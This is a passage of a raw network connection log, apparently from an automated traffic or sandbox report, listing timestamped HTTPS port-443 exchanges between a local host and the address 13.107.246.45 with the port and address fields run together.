                                          Nov 18, 2024 23:44:55.537326097 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.537430048 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.537446022 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.547920942 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.548122883 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.548295975 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.548343897 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.548345089 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.548369884 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.548392057 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.550581932 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.550618887 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.550685883 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.550795078 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.550808907 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.555831909 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.556051016 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.556114912 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.556163073 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.556164026 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.556197882 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.556232929 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.557913065 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.557944059 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.558016062 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.558132887 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.558149099 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.951134920 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.951823950 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.951848030 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.952272892 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.952280045 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.250109911 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.250715017 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.250776052 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.251157999 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.251171112 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.266346931 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.266845942 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.266896963 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.267206907 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.267225027 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.288230896 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.288609982 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.288630962 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.288942099 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.288953066 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.295977116 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.296230078 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.296315908 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.296510935 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.296524048 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.319036961 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.319361925 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.319431067 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.319511890 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.319511890 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.319552898 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.319580078 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.322345018 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.322436094 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.322530031 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.322674036 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.322696924 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.379158020 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.379471064 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.379520893 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.379553080 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.379571915 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.379582882 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.379589081 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.381557941 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.381580114 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.381642103 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.381756067 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.381762028 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.395495892 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.395622969 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.395718098 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.395836115 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.395873070 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.395915985 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.395931959 CET4435736013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.397932053 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.397983074 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.398067951 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.398206949 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.398226976 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.417270899 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.417424917 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.417510033 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.417550087 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.417550087 CET57362443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.417567968 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.417587996 CET4435736213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.419344902 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.419368982 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.419447899 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.419574976 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.419586897 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.428469896 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.428607941 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.428826094 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.428826094 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.428826094 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.430309057 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.430335045 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.430416107 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.430530071 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.430541039 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:56.737956047 CET57361443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:56.737989902 CET4435736113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.055952072 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.056459904 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.056535959 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.056878090 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.056893110 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.130925894 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.131345987 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.131411076 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.131638050 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.131654024 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.155541897 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.155898094 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.155951977 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.156276941 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.156285048 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.167582035 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.167965889 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.167985916 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.168369055 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.168380976 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.169914961 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.170311928 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.170321941 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.170701027 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.170705080 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.183998108 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.184143066 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.184242964 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.184320927 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.184359074 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.184408903 CET57363443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.184425116 CET4435736313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.186932087 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.186986923 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.187062025 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.187222004 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.187242031 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.294230938 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.294389009 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.294569016 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.294853926 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.294877052 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.294889927 CET57364443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.294898033 CET4435736413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.297491074 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.297525883 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.297734976 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.297734976 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.297781944 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.298754930 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.298795938 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.298904896 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.298942089 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.298970938 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.298994064 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.299016953 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.299030066 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.299036026 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.299050093 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.299062014 CET57366443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.299067020 CET4435736613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.299077034 CET57367443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.299096107 CET4435736713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.301245928 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.301290989 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.301310062 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.301331043 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.301358938 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.301383018 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.301470995 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.301482916 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.301547050 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.301554918 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.418853045 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.418900967 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.419018030 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.419173002 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.419173002 CET57365443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.419212103 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.419233084 CET4435736513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.421318054 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.421423912 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.421492100 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.421643972 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.421679974 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.935671091 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.936168909 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.936197042 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:57.936573982 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:57.936580896 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.034038067 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.034507036 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.034538984 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.034786940 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.034792900 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.040859938 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.041116953 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.041145086 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.041421890 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.041426897 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.056969881 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.057198048 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.057215929 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.057506084 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.057511091 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.079741001 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.080398083 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.080565929 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.080565929 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.080565929 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.083044052 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.083092928 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.083180904 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.083339930 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.083352089 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.171766996 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.172214031 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.172276020 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.172574043 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.172632933 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.172632933 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.172645092 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.172679901 CET57371443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.172693968 CET4435737113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.172935963 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.172943115 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.174808979 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.174850941 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.174881935 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.174909115 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.174984932 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.174998999 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.174998999 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.175076008 CET57369443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.175080061 CET4435736913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.175158978 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.175174952 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.176877975 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.176896095 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.176979065 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.177092075 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.177105904 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.190457106 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.190598011 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.190763950 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.190808058 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.190824032 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.190835953 CET57370443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.190841913 CET4435737013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.192733049 CET57376443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.192816019 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.192913055 CET57376443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.193013906 CET57376443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.193037033 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.300775051 CET57368443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.300787926 CET4435736813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.306674004 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.306814909 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.306900978 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.306935072 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.306935072 CET57372443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.306952000 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.306962013 CET4435737213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.309194088 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.309283972 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.309382915 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.309525013 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.309557915 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.929486036 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.930377007 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.930397034 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.930864096 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.930871010 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.940661907 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.941365957 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.941435099 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:58.941934109 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:58.941947937 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.009524107 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.010093927 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.010104895 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.010523081 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.010529041 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.054322958 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.055294991 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.055375099 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.055720091 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.055736065 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.060224056 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.060398102 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.060472012 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.060503006 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.060520887 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.060543060 CET57375443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.060549974 CET4435737513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.063200951 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.063302040 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.063565016 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.063565016 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.063647985 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.071273088 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.071604967 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.071675062 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.071733952 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.071733952 CET57374443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.071770906 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.071794033 CET4435737413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.073775053 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.073828936 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.073923111 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.074048042 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.074074030 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.143827915 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.143961906 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.144032955 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.144176006 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.144187927 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.144200087 CET57373443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.144205093 CET4435737313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.146609068 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.146712065 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.146795034 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.146919966 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.146944046 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.181771994 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.182248116 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.182333946 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.182391882 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.182391882 CET57377443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.182424068 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.182450056 CET4435737713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.184606075 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.184657097 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.184895992 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.184895992 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.184933901 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.394654989 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.395298958 CET57376443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.395333052 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.395777941 CET57376443192.168.2.413.107.246.45
